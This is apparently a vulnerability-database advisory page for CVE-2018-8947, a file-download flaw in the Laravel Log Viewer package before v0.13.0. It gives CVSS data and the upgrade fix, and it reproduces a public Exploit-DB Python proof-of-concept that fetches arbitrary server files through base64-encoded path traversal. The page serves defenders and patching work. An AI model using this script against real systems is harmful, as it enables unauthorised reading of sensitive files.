CVE-2018-8947

unknown

Published 2022-05-13 · Modified 2024-02-16

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Plaintext Storage of Sensitive Information in Laravel Log Viewer before v0.13.0

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-44343 webapps php python · 2 KB

Haboob Team · 2018-03-26

Laravel Log Viewer < 0.13.0 - Local File Download

python exploit Source: Exploit-DB

# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
# Date: 23/02/2018
# Exploit Author: Haboob Team
# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
# Version: v0.12.0 and below
# CVE : CVE-2018-8947

 
1. Description
   
Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.
 
   
2. Proof of Concept
 
#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
 
import os
import base64
from urllib2 import urlopen, URLError, HTTPError
import argparse
import cookielib
parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)

args = parser.parse_args()
url = str(args.url).strip()+"/logs/?dl="
final_file= args.file
if not os.path.exists("./0Grats0"):
    os.makedirs("./0Grats0")

word = str(args.file).split('/')
word1= "./0Grats0/"+word[-1]
finalee=url+base64.b64encode(final_file)

try:
    f = urlopen(finalee)
        with open(word1, "wb") as local_file:
            local_file.write(f.read())
except HTTPError, e:
        print "HTTP Error:", e.code, finalee
except URLError, e:
        print "URL Error:", e.reason, finalee
 
 
 
 
   
3. Solution:
   
Update to version v0.13.0
https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	rap2hpoutre/laravel-log-viewer	`<0.13.0`	`0.13.0`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.